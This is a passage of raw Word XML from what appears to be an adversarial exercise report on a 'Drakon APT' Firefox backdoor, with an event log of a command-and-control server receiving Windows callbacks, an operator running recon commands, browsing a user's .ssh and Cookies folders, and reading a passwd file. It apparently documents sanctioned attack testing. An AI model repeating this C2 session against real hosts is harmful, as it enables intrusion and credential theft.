          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="_7pd4jnc337ef" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="235" w:name="_Toc12600131"/>
      <w:bookmarkEnd w:id="234"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w14:paraId="530D8E3F"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Firefox Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A16F3AF"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DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F5085"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7AEC31" w14:textId="40524445" w:rsidR="00A351B2" w:rsidRPr="00650FDF" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>FileFilter-Elevate Driver (File System Filter Driver, Failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E525DA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="_Toc12600132"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:p w14:paraId="72EA0431" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AFD080" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167:8641/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DE8C59" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Xx--ls8h.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB27F9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F935D5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A92CC9B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFFE76" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/backup/20190506/projects/drakon-apt/oc2$ python ocMain.py --http 8640</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91CD3D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B5DF8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D0F7DE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1D465" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FDEAE0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8640  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C287874" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1D542" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367EF3A8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F565417" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4CAF2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4AA8E3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [W1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343DF9C9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A46E75" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E618F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796189BB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDC285" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [W1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C3E43" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FD50EE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191683F8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1         128.55.12.66:49267 --&gt;   128.55.12.167:8640  [HTTP]  Fri May 17 13:01:31 2019        active 66s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD17BD7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con W1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7288AA2A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF4FCE6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-marple-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496F644" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E729280" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B25D1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6596C3A7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] pid: 2768</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCB9E7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4C3C3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] C:\Program Files\mozilla\firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66D871" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8A67A0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB659A4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd C:\Users\admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3099AD70" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] cd failed with status -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F78C2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE86081" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCAE6EB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760985BB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] C:\Program Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665C5842" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB2C998" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ECC276" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DECCE41" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B185F5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CC2AC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287522F1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA506B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] AppData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7BDCAE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Application Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CDE7D0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442DFEA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44950D8B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253558F3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA238C0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C67C265" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Favorites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399495A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FBF10" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Local Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D719996" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] MozillaMailnews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1DE1FE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Music</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0773803A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] My Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750AF853" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E57E64" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2E8E15" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780D879A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A182631" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cat passwd                                                                                                                                                                [2/1816]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7DFA65" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] # $FreeBSD$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFBD14E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999644A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root:*:0:0:Charlie &amp;:/root:/bin/csh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA96B9C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>toor:*:0:0:Bourne-again Superuser:/root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A921BC2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FC461" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>operator:*:2:5:System &amp;:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DB473" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0793D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9814B7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F9E8D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A525A8B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>news:*:8:8:News Subsystem:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04685FBD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332D95F3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE5F45" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF9CBA8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4906D3F5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FE355F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24524F69" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD3714" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6BC20" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
